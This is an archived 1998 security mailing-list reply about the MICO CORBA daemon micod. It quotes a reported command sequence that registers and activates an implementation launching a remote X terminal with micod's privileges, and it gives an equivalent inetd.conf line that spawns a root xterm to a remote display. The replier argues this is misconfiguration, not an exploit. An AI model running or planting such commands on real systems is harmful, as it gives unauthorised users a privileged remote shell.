Re: MICO: security problem: Privileges of micod for everybody!

From: Miguel de Icaza (miguelat_private)
Date: Sun May 10 1998 - 15:10:30 PDT

Next message: Matt Carter: "Re: nestea2 and HP Jet Direct cards."

Previous message: David LeBlanc: "Re: Samba problems"
Maybe in reply to: Dominique Unruh: "MICO: security problem: Privileges of micod for everybody!"
Next in thread: Dominique Unruh: "Re: MICO: security problem: Privileges of micod for everybody!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> (micod ist started on inet:winkelklinke.local:8888)
> (hacking from enfin.local, which has X on display :0)
>
> imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
> "kterm -display enfin.local:0 & echo" IDL:Anything:1.0
> imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play

I would not consider this an explot, I would consider this just not
understanding what you are doing.

This `exploit' is equivalent to putting in your /etc/inetd.conf:

service stream tcp nowait root /usr/X11R6/bin/xterm -display somehost:0

Users of MICO need to implement their own authentication systems
(which we do, for those who care about the panel).

Best wishes,
Miguel.

Next message: Matt Carter: "Re: nestea2 and HP Jet Direct cards."
Previous message: David LeBlanc: "Re: Samba problems"
Maybe in reply to: Dominique Unruh: "MICO: security problem: Privileges of micod for everybody!"
Next in thread: Dominique Unruh: "Re: MICO: security problem: Privileges of micod for everybody!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:53:06 PDT